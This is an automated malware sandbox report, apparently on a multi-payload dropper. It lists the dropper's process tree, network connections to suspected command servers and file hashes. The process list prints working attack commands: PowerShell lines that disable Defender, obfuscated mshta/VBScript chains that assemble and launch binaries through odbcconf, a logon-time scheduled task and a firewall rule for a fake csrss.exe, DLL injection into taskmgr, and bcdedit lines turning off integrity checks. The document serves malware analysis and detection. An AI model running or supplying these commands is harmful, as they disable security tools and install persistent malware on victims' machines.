7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1524d92394d.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1500b8e65c1f53.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1500b8e65c1f53.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1515dbfc0edab0.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\85f5b66f8c0b9dd1838da31024190463ee565d0052f26bbfdaa84d12ed1163db.exe
"C:\Users\Admin\AppData\Local\Temp\85f5b66f8c0b9dd1838da31024190463ee565d0052f26bbfdaa84d12ed1163db.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15a8461882.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15635943177.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun154ca5fada.exe /mixtwo
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun157e7a96e632.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15168f90478cc7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15591a43f8a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1580e9cd8c23e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15372e8db79ed3d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15b94526a807b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1500b8e65c1f53.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15132bf2c585337a0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun150e9a93676ff.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15635943177.exe
Sun15635943177.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15c4c762b69ba5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1524d92394d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun156aa32cae4a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15e81af69f990d3a6.exe
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun157e7a96e632.exe
Sun157e7a96e632.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1515dbfc0edab0.exe
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1580e9cd8c23e.exe
Sun1580e9cd8c23e.exe
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15168f90478cc7.exe
Sun15168f90478cc7.exe
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15372e8db79ed3d.exe
Sun15372e8db79ed3d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1585e1028b0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun156d9ca8467.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1507dd11d509.exe
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun150e9a93676ff.exe
Sun150e9a93676ff.exe
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15591a43f8a.exe
Sun15591a43f8a.exe
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1500b8e65c1f53.exe
Sun1500b8e65c1f53.exe
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun157e7a96e632.exe
"C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun157e7a96e632.exe" -u
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15c4c762b69ba5.exe
Sun15c4c762b69ba5.exe
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun156aa32cae4a.exe
Sun156aa32cae4a.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCriPT: ClOsE(cReateoBJeCT ( "wsCRipT.shell"). RUN("cMd.ExE /q /R TyPe ""C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15635943177.exe"" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if """"== """" for %i iN (""C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15635943177.exe"" ) do taskkill /f -im ""%~Nxi"" ", 0 ,trUe ) )
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun156d9ca8467.exe
Sun156d9ca8467.exe
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1515dbfc0edab0.exe
Sun1515dbfc0edab0.exe
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15132bf2c585337a0.exe
Sun15132bf2c585337a0.exe
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15a8461882.exe
Sun15a8461882.exe
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15b94526a807b.exe
Sun15b94526a807b.exe
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun154ca5fada.exe
Sun154ca5fada.exe /mixtwo
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15e81af69f990d3a6.exe
Sun15e81af69f990d3a6.exe
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1507dd11d509.exe
Sun1507dd11d509.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2136 -s 264
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun156d9ca8467.exe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If """" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun156d9ca8467.exe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1524d92394d.exe
Sun1524d92394d.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 264
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1585e1028b0.exe
Sun1585e1028b0.exe
C:\Users\Admin\AppData\Local\Temp\is-5C9NP.tmp\Sun15b94526a807b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5C9NP.tmp\Sun15b94526a807b.tmp" /SL5="$30212,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15b94526a807b.exe"
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15b94526a807b.exe
"C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15b94526a807b.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /R TyPe "C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15635943177.exe" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if ""== "" for %i iN ("C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15635943177.exe") do taskkill /f -im "%~Nxi"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun156d9ca8467.exe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun156d9ca8467.exe" ) do taskkill -f /Im "%~NXg"
C:\Users\Admin\AppData\Local\Temp\is-H5F1P.tmp\Sun15b94526a807b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-H5F1P.tmp\Sun15b94526a807b.tmp" /SL5="$10234,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15b94526a807b.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe
..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi
C:\Windows\SysWOW64\taskkill.exe
taskkill /f -im "Sun15635943177.exe"
C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe
Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E
C:\Windows\SysWOW64\taskkill.exe
taskkill -f /Im "Sun156d9ca8467.exe"
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1507dd11d509.exe
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1507dd11d509.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If ""-PJJdHOofvf~E"" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCriPT: ClOsE(cReateoBJeCT ( "wsCRipT.shell"). RUN("cMd.ExE /q /R TyPe ""C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe"" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if ""-PS7ykUulCvwqoVkaBFLeqX_1Bi ""== """" for %i iN (""C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe"" ) do taskkill /f -im ""%~Nxi"" ", 0 ,trUe ) )
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=Sun1515dbfc0edab0.exe&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /R TyPe "C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if "-PS7ykUulCvwqoVkaBFLeqX_1Bi "== "" for %i iN ("C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe") do taskkill /f -im "%~Nxi"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "-PJJdHOofvf~E" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" ) do taskkill -f /Im "%~NXg"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1252 CREDAT:275457 /prefetch:2
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCrIPT: ClOSE (CReaTeobjECt ( "wsCRIPt.ShelL" ). run ( "cmd.EXe /R EChO 0%timE%tQM> rHUir.hh & EcHO | SeT /p = ""MZ"" > PCN3bFXS.F& copy /b /y Pcn3bFXS.F + 16AqXIX.Y + lSIVmd4C.I + VbVS~Fi.ZD+rhUIr.hh ..\JEnnF1QU.UEN & sTART odbcconf.exe /A { regsVR ..\JeNnF1QU.UEN } & deL /Q * ",0 ,TRUe ))
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBScRIpt: close (crEateoBJeCT("wscRIpT.sHELl"). RUn ( "C:\Windows\system32\cmd.exe /q /C ECho | SeT /p = ""MZ"" > 2MXG5k.pR & copy /b /y 2MXG5K.pR + A0kCLvIX.Kc + SpiKDP6.H + ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku } " ,0 , TrUE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R EChO 0%timE%tQM> rHUir.hh & EcHO | SeT /p = "MZ" > PCN3bFXS.F& copy /b /y Pcn3bFXS.F+ 16AqXIX.Y+ lSIVmd4C.I+ VbVS~Fi.ZD+rhUIr.hh ..\JEnnF1QU.UEN & sTART odbcconf.exe /A { regsVR ..\JeNnF1QU.UEN } & deL /Q *
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>PCN3bFXS.F"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C ECho | SeT /p = "MZ" > 2MXG5k.pR © /b /y 2MXG5K.pR +A0kCLvIX.Kc +SpiKDP6.H+ ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku}
C:\Windows\SysWOW64\odbcconf.exe
odbcconf.exe /A { regsVR ..\JeNnF1QU.UEN }
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECho "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>2MXG5k.pR"
C:\Windows\SysWOW64\odbcconf.exe
odbcconf.exe /a { reGSVr .\9v~4.Ku}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15a8461882.exe"
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15a8461882.exe
"C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15a8461882.exe"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241108103634.log C:\Windows\Logs\CBS\CbsPersist_20241108103634.cab
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1585e1028b0.exe
"C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1585e1028b0.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /306-306
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-954070571820006140-616807147548821308-12663393431167160248-289648020-865191173"
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
Network
| Country | Destination | Domain | Proto |
| FR | 212.193.30.45:80 | tcp | |
| FR | 212.193.30.45:80 | tcp | |
| HU | 91.219.236.27:80 | tcp | |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| HU | 91.219.236.27:80 | tcp | |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 54.205.158.59:443 | www.listincode.com | tcp |
| HU | 91.219.236.27:80 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| HU | 91.219.236.27:80 | tcp | |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | mstdn.social | udp |
| DE | 49.13.236.103:443 | mstdn.social | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| DE | 49.13.236.103:443 | mstdn.social | tcp |
| RU | 185.215.113.44:23759 | tcp | |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| DE | 49.13.236.103:443 | mstdn.social | tcp |
| DE | 49.13.236.103:443 | mstdn.social | tcp |
| US | 8.8.8.8:53 | koyu.space | udp |
| DE | 178.63.82.37:443 | koyu.space | tcp |
| HU | 91.219.236.27:80 | tcp | |
| US | 8.8.8.8:53 | cloudjah.com | udp |
| HU | 91.219.236.27:80 | tcp | |
| DE | 159.69.246.184:13127 | tcp | |
| US | 8.8.8.8:53 | learn.microsoft.com | udp |
| US | 23.192.22.89:443 | learn.microsoft.com | tcp |
| US | 23.192.22.89:443 | learn.microsoft.com | tcp |
| MD | 94.158.245.167:80 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| MD | 94.158.245.167:80 | tcp | |
| MD | 94.158.245.167:80 | tcp | |
| MD | 94.158.245.167:80 | tcp | |
| FR | 212.193.30.29:80 | tcp | |
| FR | 212.193.30.29:80 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| MD | 94.158.245.167:80 | tcp | |
| MD | 94.158.245.167:80 | tcp | |
| HU | 185.163.204.216:80 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| HU | 185.163.204.216:80 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| RO | 185.225.19.238:80 | tcp | |
| RU | 185.215.113.44:23759 | tcp | |
| RO | 185.225.19.238:80 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| DE | 159.69.246.184:13127 | tcp | |
| US | 23.192.22.89:443 | learn.microsoft.com | tcp |
| HU | 185.163.204.218:80 | tcp | |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| HU | 185.163.204.218:80 | tcp | |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| DE | 212.192.241.62:80 | tcp | |
| DE | 212.192.241.62:80 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 72.84.118.132:8080 | tcp | |
| RU | 185.215.113.44:23759 | tcp | |
| DE | 159.69.246.184:13127 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | nameiusr.com | udp |
| US | 8.8.8.8:53 | chrlerym.com | udp |
| US | 8.8.8.8:53 | opsiters.com | udp |
| US | 8.8.8.8:53 | logs.nameiusr.com | udp |
| US | 8.8.8.8:53 | logs.chrlerym.com | udp |
| US | 8.8.8.8:53 | logs.opsiters.com | udp |
| US | 8.8.8.8:53 | 7c700e5b-d34a-4f41-8f4c-d9cb51e4dbff.uuid.nameiusr.com | udp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | server7.nameiusr.com | udp |
| SG | 13.251.16.150:443 | server7.nameiusr.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 72.84.118.132:8080 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| RU | 185.215.113.44:23759 | tcp | |
| DE | 159.69.246.184:13127 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard20.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard20.blob.core.windows.net | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | dumancue.com | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| RU | 185.215.113.44:23759 | tcp | |
| DE | 159.69.246.184:13127 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| DE | 49.13.236.103:443 | mstdn.social | tcp |
| DE | 49.13.236.103:443 | mstdn.social | tcp |
| DE | 49.13.236.103:443 | mstdn.social | tcp |
| DE | 49.13.236.103:443 | mstdn.social | tcp |
| DE | 178.63.82.37:443 | koyu.space | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| RU | 185.215.113.44:23759 | tcp | |
| DE | 159.69.246.184:13127 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
Files
\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 2c3db571085a0f88cd336201868ede9c |
| SHA1 | 26f219c2369c8c4c8ad8e658fa907f73078e274c |
| SHA256 | c9a4ba85ca3416b83d174844eba1c0aeb8b55d316a68e8d6cf7a732b9c14c2fd |
| SHA512 | 34d874cd8e1b5567ba9585cdeec5cf80e35475f1f8880194f09cf2005d3f9153b76ffaa5cd6f830b99ef472b9db37546358118bf3dd0f92933662067876dd65d |
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\setup_install.exe
| MD5 | f7154abf1245e17ee802340608c5f728 |
| SHA1 | 48fc1a71ad8dd0f04699b60144ed28e50ecd61dd |
| SHA256 | 6a1adfee6f5c76521479177391647ec0cdd3c367600a72904d87c4edb25f5344 |
